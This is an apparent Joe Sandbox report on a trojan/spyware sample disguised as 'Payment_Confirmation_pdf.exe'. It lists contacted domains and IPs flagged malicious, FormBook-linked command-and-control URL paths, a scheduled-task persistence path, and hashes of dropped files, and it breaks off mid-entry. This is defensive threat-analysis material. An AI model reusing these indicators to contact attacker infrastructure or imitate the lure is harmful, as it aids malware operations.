https://support.lolipop.jp/hc/ja/articles/360049132953	sdiagnhost.exe, 00000013.00000002.2566048825.000000000564A000.00000004.10000000.00040000.00000000.sdmp, mYtMtAAMpAtCOL.exe, 00000014.00000002.2564859615.0000000003D5A000.00000004.00000001.00040000.00000000.sdmp	false	Avira URL Cloud: safe	unknown
http://vimeo.com/api/v2/video/	Payment_Confirmation_pdf.exe, cQwRvD.exe.0.dr	false		high
https://duckduckgo.com/ac/?q=	sdiagnhost.exe, 00000013.00000002.2568400764.000000000776E000.00000004.00000020.00020000.00000000.sdmp	false		high
http://tempuri.org/_prof_basesDataSet.xsd	Payment_Confirmation_pdf.exe, cQwRvD.exe.0.dr	false		high
http://vimeo.com/api/v2/channel/=http://vimeo.com/api/v2/group/	Payment_Confirmation_pdf.exe, cQwRvD.exe.0.dr	false		high
http://www.madhf.tech/1bkl/?d0s=UY22ibAHSKCKJ9FjPBVzD	firefox.exe, 00000016.00000002.1959082934.0000000027734000.00000004.80000000.00040000.00000000.sdmp	false	Avira URL Cloud: safe	unknown
http://vimeo.com/api/v2/album/	Payment_Confirmation_pdf.exe, cQwRvD.exe.0.dr	false		high
http://batit.aliyun.com/alww.html?id=00000000004252206681	sdiagnhost.exe, 00000013.00000002.2566048825.00000000057DC000.00000004.10000000.00040000.00000000.sdmp, mYtMtAAMpAtCOL.exe, 00000014.00000002.2564859615.0000000003EEC000.00000004.00000001.00040000.00000000.sdmp	false	Avira URL Cloud: safe	unknown
http://tempuri.org/_prof_basesDataSet1.xsdEcom.vimeo.api.Properties.Resources	Payment_Confirmation_pdf.exe, cQwRvD.exe.0.dr	false		high
https://duckduckgo.com/favicon.icohttps://duckduckgo.com/?q=	sdiagnhost.exe, 00000013.00000002.2568400764.000000000776E000.00000004.00000020.00020000.00000000.sdmp	false		high
https://minne.com/?utm_source=lolipop&utm_medium=banner&utm_campaign=synergy&utm_content=404	sdiagnhost.exe, 00000013.00000002.2566048825.000000000564A000.00000004.10000000.00040000.00000000.sdmp, mYtMtAAMpAtCOL.exe, 00000014.00000002.2564859615.0000000003D5A000.00000004.00000001.00040000.00000000.sdmp	false	Avira URL Cloud: safe	unknown
http://vimeo.com/api/v2/	Payment_Confirmation_pdf.exe, cQwRvD.exe.0.dr	false		high
https://ch.search.yahoo.com/sugg/chrome?output=fxjson&appid=crmas&command=	sdiagnhost.exe, 00000013.00000002.2568400764.000000000776E000.00000004.00000020.00020000.00000000.sdmp	false		high
http://assets.lolipop.jp/img/bnr/bnr_lolipop_ad_001.gif	sdiagnhost.exe, 00000013.00000002.2566048825.000000000564A000.00000004.10000000.00040000.00000000.sdmp, mYtMtAAMpAtCOL.exe, 00000014.00000002.2564859615.0000000003D5A000.00000004.00000001.00040000.00000000.sdmp	false	Avira URL Cloud: safe	unknown
http://vimeo.com/api/v2/activity/	Payment_Confirmation_pdf.exe, cQwRvD.exe.0.dr	false		high
https://lolipop.jp/	sdiagnhost.exe, 00000013.00000002.2566048825.000000000564A000.00000004.10000000.00040000.00000000.sdmp, mYtMtAAMpAtCOL.exe, 00000014.00000002.2564859615.0000000003D5A000.00000004.00000001.00040000.00000000.sdmp	false		high
https://www.ecosia.org/newtab/	sdiagnhost.exe, 00000013.00000002.2568400764.000000000776E000.00000004.00000020.00020000.00000000.sdmp	false		high
https://www.chiark.greenend.org.uk/~sgtatham/putty/0	Payment_Confirmation_pdf.exe, cQwRvD.exe.0.dr	false		high
https://pepabo.com/	sdiagnhost.exe, 00000013.00000002.2566048825.000000000564A000.00000004.10000000.00040000.00000000.sdmp, mYtMtAAMpAtCOL.exe, 00000014.00000002.2564859615.0000000003D5A000.00000004.00000001.00040000.00000000.sdmp	false	Avira URL Cloud: safe	unknown
https://ac.ecosia.org/autocomplete?q=	sdiagnhost.exe, 00000013.00000002.2568400764.000000000776E000.00000004.00000020.00020000.00000000.sdmp	false		high
https://ch.search.yahoo.com/favicon.icohttps://ch.search.yahoo.com/search	sdiagnhost.exe, 00000013.00000002.2568400764.000000000776E000.00000004.00000020.00020000.00000000.sdmp	false		high
http://www.innovateideas.xyz	mYtMtAAMpAtCOL.exe, 00000014.00000002.2567539017.000000000594C000.00000040.80000000.00040000.00000000.sdmp	false	Avira URL Cloud: safe	unknown
http://js.ad-stir.com/js/adstir.js?20130527	sdiagnhost.exe, 00000013.00000002.2566048825.000000000564A000.00000004.10000000.00040000.00000000.sdmp, mYtMtAAMpAtCOL.exe, 00000014.00000002.2564859615.0000000003D5A000.00000004.00000001.00040000.00000000.sdmp	false		high
http://schemas.xmlsoap.org/ws/2005/05/identity/claims/name	Payment_Confirmation_pdf.exe, 00000000.00000002.1426301513.0000000003155000.00000004.00000800.00020000.00000000.sdmp, cQwRvD.exe, 0000000B.00000002.1591356041.00000000031B0000.00000004.00000800.00020000.00000000.sdmp	false		high
https://cdn.ecosia.org/assets/images/ico/favicon.icohttps://www.ecosia.org/search?q=	sdiagnhost.exe, 00000013.00000002.2568400764.000000000776E000.00000004.00000020.00020000.00000000.sdmp	false		high
https://static.minne.com/files/banner/minne_600x500	sdiagnhost.exe, 00000013.00000002.2566048825.000000000564A000.00000004.10000000.00040000.00000000.sdmp, mYtMtAAMpAtCOL.exe, 00000014.00000002.2564859615.0000000003D5A000.00000004.00000001.00040000.00000000.sdmp	false	Avira URL Cloud: safe	unknown

World Map of Contacted IPs

No. of IPs < 25%
25% < No. of IPs < 50%
50% < No. of IPs < 75%
75% < No. of IPs

Public IPs

IP	Domain	Country	ASN	ASN Name	Malicious
209.74.77.108	www.innovateideas.xyz	United States	31744	MULTIBAND-NEWHOPEUS	true
163.44.185.183	www.sankan-fukushi.info	Japan	7506	INTERQGMOInternetIncJP	false
103.224.182.242	www.madhf.tech	Australia	133618	TRELLIAN-AS-APTrellianPtyLimitedAU	false
118.107.250.103	www.zxyck.net	Hong Kong	24321	OCENET-AS-APOCESdnBhdISPMY	true
120.26.240.121	www.buckser.info	China	37963	CNNIC-ALIBABA-CN-NET-APHangzhouAlibabaAdvertisingCoLtd	true

General Information

Joe Sandbox version:	41.0.0 Charoite
Analysis ID:	1563622
Start date and time:	2024-11-27 08:53:11 +01:00
Joe Sandbox product:	CloudBasic
Overall analysis duration:	0h 9m 32s
Hypervisor based Inspection enabled:	false
Report type:	full
Cookbook file name:	default.jbs
Analysis system description:	Windows 10 x64 22H2 with Office Professional Plus 2019, Chrome 117, Firefox 118, Adobe Reader DC 23, Java 8 Update 381, 7zip 23.01
Number of analysed new started processes analysed:	24
Number of new started drivers analysed:	0
Number of existing processes analysed:	0
Number of existing drivers analysed:	0
Number of injected processes analysed:	2
Technologies:	HCA enabled EGA enabled AMSI enabled
Analysis Mode:	default
Analysis stop reason:	Timeout
Sample name:	Payment_Confirmation_pdf.exe
Detection:	MAL
Classification:	mal100.troj.spyw.evad.winEXE@25/16@9/5
EGA Information:	Successful, ratio: 100%
HCA Information:	Successful, ratio: 98% Number of executed functions: 205 Number of non-executed functions: 276
Cookbook Comments:	Found application associated with file extension: .exe

Warnings

Exclude process from analysis (whitelisted): MpCmdRun.exe, dllhost.exe, WMIADAP.exe, SIHClient.exe, conhost.exe, svchost.exe
Excluded domains from analysis (whitelisted): fs.microsoft.com, otelrules.azureedge.net, slscr.update.microsoft.com, ctldl.windowsupdate.com, time.windows.com, fe3cr.delivery.mp.microsoft.com
Not all processes where analyzed, report is missing behavior information
Report creation exceeded maximum time and may have missing disassembly code information.
Report size exceeded maximum capacity and may have missing behavior information.
Report size getting too big, too many NtCreateKey calls found.
Report size getting too big, too many NtOpenKeyEx calls found.
Report size getting too big, too many NtProtectVirtualMemory calls found.
Report size getting too big, too many NtQueryValueKey calls found.
Some HTTP raw data packets have been limited to 10 per session. Please view the PCAPs for the complete data.

Simulations

Behavior and APIs

Time	Type	Description
02:54:13	API Interceptor	1x Sleep call for process: Payment_Confirmation_pdf.exe modified
02:54:20	API Interceptor	43x Sleep call for process: powershell.exe modified
02:54:25	API Interceptor	1x Sleep call for process: cQwRvD.exe modified
04:40:21	API Interceptor	1583777x Sleep call for process: sdiagnhost.exe modified
08:54:23	Task Scheduler	Run new task: cQwRvD path: C:\Users\user\AppData\Roaming\cQwRvD.exe

Joe Sandbox View / Context

IPs

Match	Associated Sample Name / URL	SHA 256	Detection	Threat Name	Link	Context
209.74.77.108	IETC-24017.exe	Get hash	malicious	FormBook, PureLog Stealer	Browse	www.urbanfashion.website/aezw/
	VSP469620.exe	Get hash	malicious	FormBook	Browse	www.urbanxplore.info/chlo/?9HaD=WJ8Pjkl58Iqvi8v+346A7W2JCurCP35uavULUkOWxAdWurHwpVHOzp+Wq3EHGCpSI2RFmnu5nAtTba/o9p0CIyXXw9XhC0V5AfBtSRheiGahxikEfA==&wdv4=1RD4
	CV_ Filipa Barbosa.exe	Get hash	malicious	FormBook	Browse	www.mindfulmo.life/grm8/
	Mandatory Notice for all December Leave and Vacation application.exe	Get hash	malicious	FormBook	Browse	www.hobbihub.info/i5gf/
	CV_ Filipa Barbosa.exe	Get hash	malicious	FormBook	Browse	www.mindfulmo.life/grm8/
163.44.185.183	DO-COSU6387686280.pdf.exe	Get hash	malicious	FormBook, PureLog Stealer	Browse	www.sankan-fukushi.info/qq1e/
	IETC-24017.exe	Get hash	malicious	FormBook, PureLog Stealer	Browse	www.sankan-fukushi.info/9k5s/
	SWIFT COPY 0028_pdf.exe	Get hash	malicious	FormBook	Browse	www.sankan-fukushi.info/21k5/
	Item-RQF-9456786.exe	Get hash	malicious	Unknown	Browse	www.sankan-fukushi.info/p9qy/
	order I 018629.xlsx	Get hash	malicious	FormBook	Browse	www.hihoha-menu.com/g24i/?Ij=C5lZ/tNmDIazGhz+mgSCdtEua581lzsfl6vwo2v3mqTQwnv5rjnUBpQzMVK0NvbkQlVLQw==&0f=e0DHTPtxAZK
103.224.182.242	PAYROLL LIST.exe	Get hash	malicious	FormBook	Browse	www.madhf.tech/3iym/
	Purchase Order PO.exe	Get hash	malicious	FormBook	Browse	www.madhf.tech/6ou6/
	Payroll List.exe	Get hash	malicious	FormBook	Browse	www.klohk.tech/3m3e/
	Thermo Fisher Scientific - Aj#U00e1nlatk#U00e9r#U00e9s.exe	Get hash	malicious	FormBook	Browse	www.madhf.tech/0mwe/
	DOC_114542366.vbe	Get hash	malicious	FormBook	Browse	www.seeseye.website/37ym/?KV=8/t/mdNf2RQMOaNBNJ0C2CHQCZtSfGEsPKxsb92U4gy0IzojrjG5dpGxrabMefB+TiCWCE+I+OwKVMkti2s7d6J9YJjeD9jGibmgDAwgawFnRnPmUcSsGcI=&Wno=a0qDq
	SWIFT COPY 0028_pdf.exe	Get hash	malicious	FormBook	Browse	www.madhf.tech/vpqb/
	PROFORMA INVOICE.exe	Get hash	malicious	FormBook	Browse	www.klohk.tech/3m3e/
	Item-RQF-9456786.exe	Get hash	malicious	Unknown	Browse	www.madhf.tech/p31e/
	http://perpetualsnob.com	Get hash	malicious	Unknown	Browse	perpetualsnob.com/?fp=a3db7cd464228025d120ca597c81b5f2
	Shipping documents..exe	Get hash	malicious	FormBook	Browse	www.klohk.tech/3m3e/

Domains

Match	Associated Sample Name / URL	SHA 256	Detection	Threat Name	Link	Context
www.zxyck.net	DO-COSU6387686280.pdf.exe	Get hash	malicious	FormBook, PureLog Stealer	Browse	118.107.250.103
www.zxyck.net	A2028041200SD.exe	Get hash	malicious	FormBook	Browse	118.107.250.103
www.madhf.tech	PAYROLL LIST.exe	Get hash	malicious	FormBook	Browse	103.224.182.242
	Purchase Order PO.exe	Get hash	malicious	FormBook	Browse	103.224.182.242
	Thermo Fisher Scientific - Aj#U00e1nlatk#U00e9r#U00e9s.exe	Get hash	malicious	FormBook	Browse	103.224.182.242
	SWIFT COPY 0028_pdf.exe	Get hash	malicious	FormBook	Browse	103.224.182.242
	Item-RQF-9456786.exe	Get hash	malicious	Unknown	Browse	103.224.182.242
www.sankan-fukushi.info	DO-COSU6387686280.pdf.exe	Get hash	malicious	FormBook, PureLog Stealer	Browse	163.44.185.183
	IETC-24017.exe	Get hash	malicious	FormBook, PureLog Stealer	Browse	163.44.185.183
	SWIFT COPY 0028_pdf.exe	Get hash	malicious	FormBook	Browse	163.44.185.183
	Item-RQF-9456786.exe	Get hash	malicious	Unknown	Browse	163.44.185.183
www.buckser.info	Payment-251124.exe	Get hash	malicious	FormBook	Browse	114.55.89.54

ASNs

Match	Associated Sample Name / URL	SHA 256	Detection	Threat Name	Link	Context
TRELLIAN-AS-APTrellianPtyLimitedAU	kkEzK284oT.exe	Get hash	malicious	HTMLPhisher	Browse	103.224.182.206
	http://begantotireo.xyz	Get hash	malicious	Unknown	Browse	103.224.212.217
	http://begantotireo.xyz	Get hash	malicious	Unknown	Browse	103.224.212.217
	PAYROLL LIST.exe	Get hash	malicious	FormBook	Browse	103.224.182.242
	Purchase Order PO.exe	Get hash	malicious	FormBook	Browse	103.224.182.242
	Payroll List.exe	Get hash	malicious	FormBook	Browse	103.224.182.242
	Thermo Fisher Scientific - Aj#U00e1nlatk#U00e9r#U00e9s.exe	Get hash	malicious	FormBook	Browse	103.224.182.242
	DOC_114542366.vbe	Get hash	malicious	FormBook	Browse	103.224.182.242
	SWIFT COPY 0028_pdf.exe	Get hash	malicious	FormBook	Browse	103.224.182.242
	PROFORMA INVOICE.exe	Get hash	malicious	FormBook	Browse	103.224.182.242
OCENET-AS-APOCESdnBhdISPMY	DO-COSU6387686280.pdf.exe	Get hash	malicious	FormBook, PureLog Stealer	Browse	118.107.250.103
	A2028041200SD.exe	Get hash	malicious	FormBook	Browse	118.107.250.103
	3NvALxFlHV.exe	Get hash	malicious	FormBook	Browse	202.87.223.248
	PO-000172483.exe	Get hash	malicious	FormBook	Browse	202.87.223.248
	PO#071024.exe	Get hash	malicious	FormBook	Browse	202.87.223.248
	PO#001498.exe	Get hash	malicious	FormBook	Browse	202.87.223.248
	CENA.exe	Get hash	malicious	FormBook	Browse	202.87.223.248
	P030092024LANDWAY.exe	Get hash	malicious	FormBook	Browse	202.87.223.248
	https://srirakyat.i-ruma.com/RegisterNewResident?p=dbfe6cc3-1784-494c-b756-f53c8ffa4033	Get hash	malicious	Unknown	Browse	118.107.235.89
	ImVMtU7aeB.elf	Get hash	malicious	Mirai	Browse	118.107.193.237
INTERQGMOInternetIncJP	la.bot.sh4.elf	Get hash	malicious	Unknown	Browse	210.253.96.32
	DO-COSU6387686280.pdf.exe	Get hash	malicious	FormBook, PureLog Stealer	Browse	163.44.185.183
	IETC-24017.exe	Get hash	malicious	FormBook, PureLog Stealer	Browse	163.44.185.183
	SWIFT COPY 0028_pdf.exe	Get hash	malicious	FormBook	Browse	163.44.185.183
	exe009.exe	Get hash	malicious	Emotet	Browse	157.7.164.178
	https://us-west-2.protection.sophos.com/?d=vercel.app&u=aHR0cHM6Ly93ZWJtYWlsLWF1dGgtc2VjLnZlcmNlbC5hcHA=&i=NWVjYjQ2MzZmNTgwNWIwZWJlZWZkM2Fl&t=UXZ3YkZpNSszWkdZNlBPdUNtNGVRQTM2ZzV1SmdscHZTN2E0TDhEQUVMYz0=&h=41cf60c27bc24f608fa5f6f60edfa437&s=AVNPUEhUT0NFTkNSWVBUSVYWbs5htFrsKfDZKi2vxyeN8JAV7eyBc8AqkmOaHaHVi8YGx5zRAzUm2TNYTJQ1rCs#Ymtqb29AaGRlbC5jby5rcg==	Get hash	malicious	Unknown	Browse	150.95.219.20
	Item-RQF-9456786.exe	Get hash	malicious	Unknown	Browse	163.44.185.183
	TT copy.exe	Get hash	malicious	FormBook	Browse	150.95.254.16
	botnet.m68k.elf	Get hash	malicious	Mirai, Moobot	Browse	150.95.219.222
	spc.elf	Get hash	malicious	Mirai, Moobot	Browse	157.7.100.20
MULTIBAND-NEWHOPEUS	W3MzrFzSF0.exe	Get hash	malicious	FormBook, PureLog Stealer	Browse	209.74.77.109
	FACTURA 24V70 VINS.exe	Get hash	malicious	FormBook	Browse	209.74.64.190
	DO-COSU6387686280.pdf.exe	Get hash	malicious	FormBook, PureLog Stealer	Browse	209.74.77.109
	packing list G25469.exe	Get hash	malicious	FormBook	Browse	209.74.64.59
	IETC-24017.exe	Get hash	malicious	FormBook, PureLog Stealer	Browse	209.74.77.108
	PAYROLL LIST.exe	Get hash	malicious	FormBook	Browse	209.74.77.109
	file.exe	Get hash	malicious	FormBook	Browse	209.74.77.109
	VSP469620.exe	Get hash	malicious	FormBook	Browse	209.74.77.108
	CV_ Filipa Barbosa.exe	Get hash	malicious	FormBook	Browse	209.74.77.108
	Purchase Order PO.exe	Get hash	malicious	FormBook	Browse	209.74.77.107

Process:	C:\Users\user\Desktop\Payment_Confirmation_pdf.exe
File Type:	ASCII text, with CRLF line terminators
Category:	dropped
Size (bytes):	1730
Entropy (8bit):	5.35299682261553
Encrypted:	false
SSDEEP:	48:MIHK5HKH1qHiYHKh3oPtHo6hAHKze0HKHKMR5vzHKnHKU57Uy:Pq5qHwCYqh3oPtI6eqzxqqMR5rqnqU5t
MD5:	4D047149BCD6E4625565C631F1F723B2
SHA1:	33909516B8ACB42E0B7E5E7D48F8B2D917094BCB
SHA-256:	E84139F7D948F47ADF2E6346641261ADED096D1DB640EFF9B9B7D122121685DC
SHA-512:	AE0D2AC2C282AEBA1B63851529892240C3BE5D56F3996F1BEE3263FBB13A7A044348D63F04B0705836C5847994BD553F342511F6BB4DD075E4E8A3E9CB12D54F
Malicious:	true
Preview:	1,"fusion","GAC",0..1,"WinRT","NotApp",1..2,"System.Windows.Forms, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089",0..3,"System, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089","C:\Windows\assembly\NativeImages_v4.0.30319_32\System\920e3d1d70447c3c10e69e6df0766568\System.ni.dll",0..2,"System.Drawing, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b03f5f7f11d50a3a",0..3,"System.Core, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089","C:\Windows\assembly\NativeImages_v4.0.30319_32\System.Core\8b2c1203fd20aea8260bfbc518004720\System.Core.ni.dll",0..3,"System.Configuration, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b03f5f7f11d50a3a","C:\Windows\assembly\NativeImages_v4.0.30319_32\System.Configuration\2192b0d5aa4aa14486ae08118d3b9fcc\System.Configuration.ni.dll",0..3,"System.Xml, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089","C:\Windows\assembly\NativeImages_v4.0.30319_32\System.Xml\2062ed810929ec0e33254c02

C:\Users\user\AppData\Local\Microsoft\CLR_v4.0_32\UsageLogs\cQwRvD.exe.log

Download File

Process:	C:\Users\user\AppData\Roaming\cQwRvD.exe
File Type:	ASCII text, with CRLF line terminators
Category:	dropped
Size (bytes):	1730
Entropy (8bit):	5.35299682261553
Encrypted:	false
SSDEEP:	48:MIHK5HKH1qHiYHKh3oPtHo6hAHKze0HKHKMR5vzHKnHKU57Uy:Pq5qHwCYqh3oPtI6eqzxqqMR5rqnqU5t
MD5:	4D047149BCD6E4625565C631F1F723B2
SHA1:	33909516B8ACB42E0B7E5E7D48F8B2D917094BCB
SHA-256:	E84139F7D948F47ADF2E6346641261ADED096D1DB640EFF9B9B7D122121685DC
SHA-512:	AE0D2AC2C282AEBA1B63851529892240C3BE5D56F3996F1BEE3263FBB13A7A044348D63F04B0705836C5847994BD553F342511F6BB4DD075E4E8A3E9CB12D54F
Malicious:	false
Preview:	1,"fusion","GAC",0..1,"WinRT","NotApp",1..2,"System.Windows.Forms, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089",0..3,"System, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089","C:\Windows\assembly\NativeImages_v4.0.30319_32\System\920e3d1d70447c3c10e69e6df0766568\System.ni.dll",0..2,"System.Drawing, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b03f5f7f11d50a3a",0..3,"System.Core, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089","C:\Windows\assembly\NativeImages_v4.0.30319_32\System.Core\8b2c1203fd20aea8260bfbc518004720\System.Core.ni.dll",0..3,"System.Configuration, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b03f5f7f11d50a3a","C:\Windows\assembly\NativeImages_v4.0.30319_32\System.Configuration\2192b0d5aa4aa14486ae08118d3b9fcc\System.Configuration.ni.dll",0..3,"System.Xml, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089","C:\Windows\assembly\NativeImages_v4.0.30319_32\System.Xml\2062ed810929ec0e33254c02

C:\Users\user\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive

Download File

Process:	C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
File Type:	data
Category:	dropped
Size (bytes):	2232
Entropy (8bit):	5.379460230152629
Encrypted:	false
SSDEEP:	48:fWSU4y4RQmFoUeWmfgZ9tK8NPZHUm7u1iMuge//ZPUyjNs:fLHyIFKL3IZ2KRH9OugWNs
MD5:	5040BC0AA3939852C2FCC47A13FA166B
SHA1:	509CA0EC93DC9A43512694FFC398328207DC8339
SHA-256:	17C04186A1ADA525DA8F869BB03747D347F45888CCA863DE1941B9FC457361F4
SHA-512:	B9508550F9045948C54E39BDF40C2DB62A768568C9A89930DABF211E8B24851A8F7506ACBA37F4138F16DF0746A323C84ABDB4DDE7214336C93958918F3E944B
Malicious:	false
Preview:	@...e................................................@..........P................1]...E.....j.....(.Microsoft.PowerShell.Commands.ManagementH...............o..b~.D.poM......... .Microsoft.PowerShell.ConsoleHost0......................C.l]..7.s........System..4....................D...{..\|f........System.Core.D...............4..7..D.#V.............System.Management.AutomationL.................gQ?O.....x5.......#.Microsoft.Management.Infrastructure.<................t.,.lG....M...........System.Management...@................z.U..G...5.f.1........System.DirectoryServices4.................%...K... ...........System.Xml..8..................1...L..U;V.<}........System.Numerics.4.....................@.[8]'.\........System.Data.<...............i..VdqF...\|...........System.ConfigurationH................WY..2.M.&..g(g........Microsoft.PowerShell.Security...<...............V.}...@...i...........System.Transactions.P...............8..{...@.e..."4.......%.Microsoft.PowerShell.Com

C:\Users\user\AppData\Local\Temp\I130O15

Download File

Process:	C:\Windows\SysWOW64\sdiagnhost.exe
File Type:	SQLite 3.x database, last written using SQLite version 3042000, page size 2048, file counter 7, database pages 89, cookie 0x36, schema 4, UTF-8, version-valid-for 7
Category:	modified
Size (bytes):	196608
Entropy (8bit):	1.1215420383712111
Encrypted:	false
SSDEEP:	384:r2qOB1nxCkvSAELyKOMq+8HKkjucswRv8p3:aq+n0E9ELyKOMq+8HKkjuczRv89
MD5:	9A809AD8B1FDDA60760BB6253358A1DB
SHA1:	D7BBC6B5EF1ACF8875B36DEA141C9911BADF9F66
SHA-256:	95756B4CE2E462117AF93FE5E35AD0810993D31CC6666B399BEE3B336A63219A
SHA-512:	2680CEAA75837E374C4FB28B7A0CD1F699F2DAAE7BFB895A57FDB8D9727A83EF821F2B75B91CB53E00B75468F37DC3009582FC54F5D07B2B62F3026B0185FF73
Malicious:	false
Preview:	SQLite format 3......@ .......Y...........6......................................................j............W........................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_5chkhlyv.0rn.ps1

Download File

Process:	C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
File Type:	ASCII text, with no line terminators
Category:	dropped
Size (bytes):	60
Entropy (8bit):	4.038920595031593
Encrypted:	false
SSDEEP:	3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
MD5:	D17FE0A3F47BE24A6453E9EF58C94641
SHA1:	6AB83620379FC69F80C0242105DDFFD7D98D5D9D
SHA-256:	96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
SHA-512:	5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
Malicious:	false
Preview:	# PowerShell test file to determine AppLocker lockdown mode

C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_ajhdwqiy.tov.psm1

Download File

Process:	C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
File Type:	ASCII text, with no line terminators
Category:	dropped
Size (bytes):	60
Entropy (8bit):	4.038920595031593
Encrypted:	false
SSDEEP:	3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
MD5:	D17FE0A3F47BE24A6453E9EF58C94641
SHA1:	6AB83620379FC69F80C0242105DDFFD7D98D5D9D
SHA-256:	96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
SHA-512:	5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
Malicious:	false
Preview:	# PowerShell test file to determine AppLocker lockdown mode

C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_avgva44b.h4w.psm1

Download File

Process:	C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
File Type:	ASCII text, with no line terminators
Category:	dropped
Size (bytes):	60
Entropy (8bit):	4.038920595031593
Encrypted:	false
SSDEEP:	3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
MD5:	D17FE0A3F47BE24A6453E9EF58C94641
SHA1:	6AB83620379FC69F80C0242105DDFFD7D98D5D9D
SHA-256:	96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
SHA-512:	5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
Malicious:	false
Preview:	# PowerShell test file to determine AppLocker lockdown mode

C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_mqeinijq.lom.ps1

Download File

Process:	C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
File Type:	ASCII text, with no line terminators
Category:	dropped
Size (bytes):	60
Entropy (8bit):	4.038920595031593
Encrypted:	false
SSDEEP:	3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
MD5:	D17FE0A3F47BE24A6453E9EF58C94641
SHA1:	6AB83620379FC69F80C0242105DDFFD7D98D5D9D
SHA-256:	96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
SHA-512:	5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
Malicious:	false
Preview:	# PowerShell test file to determine AppLocker lockdown mode

C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_n0zzbrf5.wl1.ps1

Download File

Process:	C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
File Type:	ASCII text, with no line terminators
Category:	dropped
Size (bytes):	60
Entropy (8bit):	4.038920595031593
Encrypted:	false
SSDEEP:	3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
MD5:	D17FE0A3F47BE24A6453E9EF58C94641
SHA1:	6AB83620379FC69F80C0242105DDFFD7D98D5D9D
SHA-256:	96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
SHA-512:	5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
Malicious:	false
Preview:	# PowerShell test file to determine AppLocker lockdown mode

C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_pkuwj4uj.oew.ps1

Download File

Process:	C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
File Type:	ASCII text, with no line terminators
Category:	dropped
Size (bytes):	60
Entropy (8bit):	4.038920595031593
Encrypted:	false
SSDEEP:	3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
MD5:	D17FE0A3F47BE24A6453E9EF58C94641
SHA1:	6AB83620379FC69F80C0242105DDFFD7D98D5D9D
SHA-256:	96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
SHA-512:	5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
Malicious:	false
Preview:	# PowerShell test file to determine AppLocker lockdown mode

C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_vu1inh2s.hht.psm1

Download File

Process:	C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
File Type:	ASCII text, with no line terminators
Category:	dropped
Size (bytes):	60
Entropy (8bit):	4.038920595031593
Encrypted:	false
SSDEEP:	3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
MD5:	D17FE0A3F47BE24A6453E9EF58C94641
SHA1:	6AB83620379FC69F80C0242105DDFFD7D98D5D9D
SHA-256:	96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
SHA-512:	5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
Malicious:	false
Preview:	# PowerShell test file to determine AppLocker lockdown mode

C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_x02cdm1f.wfo.psm1

Download File

Process:	C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
File Type:	ASCII text, with no line terminators
Category:	dropped
Size (bytes):	60
Entropy (8bit):	4.038920595031593
Encrypted:	false
SSDEEP:	3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
